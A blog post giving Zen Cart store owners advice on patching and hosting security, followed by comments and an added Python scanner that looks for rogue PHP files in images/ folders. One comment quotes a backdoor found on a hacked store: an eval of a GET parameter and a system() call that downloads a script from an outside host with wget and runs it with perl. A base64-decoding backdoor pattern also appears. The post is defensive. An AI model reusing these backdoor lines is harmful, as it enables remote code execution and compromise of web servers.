Secure your Zencart – A time consuming yet easy task

I have run Windows XP for years without any virus/trojan/spyware problem. How, you ask? I apply security patches regularly, I use the free Avast! antivirus to keep the viruses and trojans out, I use ZoneAlarm’s free firewall to keep the hackers at bay, I use Firefox with an ad-block plugin to stop spam, and obviously I know what I’m doing so I just don’t go and click on any popup saying “Security Alert! Scan your computer for FREE”.

Alright, my rant about Windows stops here. What I meant to say was: if you actively protect yourself then the chance that someone can harm your computer or your website is really low. Last week, I received a message from a user on the Zencart forum asking me this:

Hi yellow can you explain what is going on with hundreds and hundreds of zen cart stores? If you read my thread possible hack in the security section you will see what I mean. This is getting worse as well.

BTW, if you didn’t know yet, I go by the nick yellow1912 on the Zencart forum.

Below is the rest of our conversation:

Me:

A few things to consider:

1. People never upgrade their stores, I know some people are still at 1.2.x which is many years old.
Some others don’t apply security patches when they need to (1.3.8 has a bunch of those).

2. The current code of zencart doesn’t allow patches to be applied automatically like wordpress for example, so that may explain point 1.

3. Some hacks are caused by other reasons, for example: some stores have joomla (old versions) on the same site and joomla was hacked.
Or in some cases, users are on shared hosting and some other sites stored on the same host were hacked first which left the whole server vulnerable.

Hope this can help

The user:

Thanks for the reply yellow but I have 1.3.8a installed and did the security updates etc. Is there any way of knowing how my site was hacked into and how they added code to EVERY single .PHP file? I don’t feel like zen cart is safe now.

Me:

It is more than likely that your server was hacked, and there are just many ways for that to happen:

1. a computer which is used to access the site was compromised (virus, trojan,…)
2. your server was hacked (this happens a lot when you are on the same server with many others, and this is the case for most unless you have a dedicated server)
3. the host doesn’t have a good security policy.

In any case, you may want to contact your host to see how hackers got in your site. They should have logs on the server that may help with that. Posting the exact hack details in the zen security forum also helps as others might be able to tell you what went wrong.

I used Zen for 3 years and the only time I was hacked was because 1 of my partner’s computers was infected with a trojan.

Note that the hacker can’t really change all your files unless:
1. he has access to your ftp account (this means he doesn’t hack through zencart)
2. he manages to hack thru zencart, then uses the define page to put php code in there and manages to infect all other files. This happens only when your hosting doesn’t have good policies to prevent this (using php on cgi is a good way to reduce this risk, some hosts don’t do this though)

What is the moral of the story here? Update regularly: it is better not to get hacked at all than to have to fix what has been done. If you do get hacked though, make sure you follow this guide AND fully scan your computer for viruses, trojans and such. Better yet, limit access to your site admin, FTP and such to certain computers only. Also, if you can afford it, go for a hosting plan where you don’t share the server with anyone else (you wouldn’t want to sleep in the same bed with some total strangers, would you?)

Now here are some tips to protect yourself:

  1. Subscribe to Zencart announcements to make sure you get the security news as soon as possible: http://www.zen-cart.com/forum/subscription.php?do=addsubscription&f=2
  2. Subscribe to RubikIntegration’s feed as well; we always update our feed with important news as well as tips and tricks for Zencart: http://feeds.feedburner.com/rubikintegration
  3. Apply security patches AS SOON AS THEY COME OUT.
  4. Never access your site FTP or Admin from computers you do not trust!
  5. Beware when you give out FTP or Admin info.
  6. If you use other software such as WordPress and Joomla on your site as well, make sure it is up-to-date.
  7. If you “sleep on the same bed with total strangers” as mentioned above, well, God bless you.

Note: I have personally helped tons of people to install various modules such as SSU and Ajax Checkout and I always DELETE all that info after the work is done. But you cannot trust everyone to do that, and what if they are trustworthy but their computers were infected? Please protect yourself!

Be safe.

Raine

4 Responses to “Secure your Zencart – A time consuming yet easy task”

  1. admin says:

    Just an update to the post: We have had many customers contact us recently for security help because their carts were hacked. Please please make sure your cart is updated:

    http://www.zen-cart.com/forum/showthread.php?t=131115

  2. admin says:

    Note: In the process of cleaning several stores I have seen something worth mentioning: check your images/ folder and see if there is any rogue file there (no php file should ever be there). The rogue file usually contains content like this:
    $a=base64_decode('LyoKKioqKioqKi…');

    …..

    This is definitely a backdoor set by the hacker, please make sure that you delete that file(s).

  3. Cliff says:

    I found evil.php in my images directory. Contents of the file are

  4. Cliff says:

    Oops, stripped the code.
    /?php eval(stripslashes($_GET[e]));?/ /?php system(“cd /tmp;wget smenar.clan.su/payments.txt;perl payments.txt”);?/
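
The check described in the comments above (no PHP file should ever sit in images/, and the files found there used base64_decode, eval and system) can be run as a scan. This is an added example, not part of the original post or its comments; the function names, the extension list and the sample files are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Markers taken from the samples quoted in the comments. Heuristics only:
# a hit means "review this file by hand", not proof of compromise.
MARKERS = {
    "base64_decode": re.compile(rb"base64_decode\s*\("),
    "eval": re.compile(rb"\beval\s*\("),
    "system": re.compile(rb"\bsystem\s*\("),
    "request-input": re.compile(rb"\$_(GET|POST|REQUEST|COOKIE)\b"),
}
# Extensions a server may hand to PHP (assumed list; match it to your host's
# configuration). Also catches double extensions such as "x.php.jpg".
PHP_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)

def scan_upload_dir(root):
    """Return {relative_path: [reasons]} for every suspicious file under root."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = ["php-extension"] if PHP_EXT.search(name) else []
            with open(path, "rb") as fh:
                data = fh.read(1024 * 1024)  # the first 1 MiB is enough here
            if b"<?php" in data.lower():
                reasons.append("php-open-tag")  # PHP hidden inside an "image"
            reasons += [label for label, rx in MARKERS.items() if rx.search(data)]
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings

def make_sample_tree():
    """Build a constructed images/ tree in a temp dir (harmless sample content)."""
    root = tempfile.mkdtemp(prefix="images_")
    os.mkdir(os.path.join(root, "sub"))
    samples = {
        "logo.gif": b"GIF89a\x01\x00\x01\x00",
        "evil.php": b"<?php $a=base64_decode('Q09OU1RSVUNURUQ='); eval($a); ?>",
        os.path.join("sub", "banner.php.jpg"): b"\xff\xd8\xff<?php echo 'constructed'; ?>",
    }
    for rel, content in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(content)
    return root

if __name__ == "__main__":
    for rel, reasons in sorted(scan_upload_dir(make_sample_tree()).items()):
        print(f"{rel}: {', '.join(reasons)}")
```

On a real store, call scan_upload_dir() with the path to your own images/ directory and inspect every reported file before deleting it.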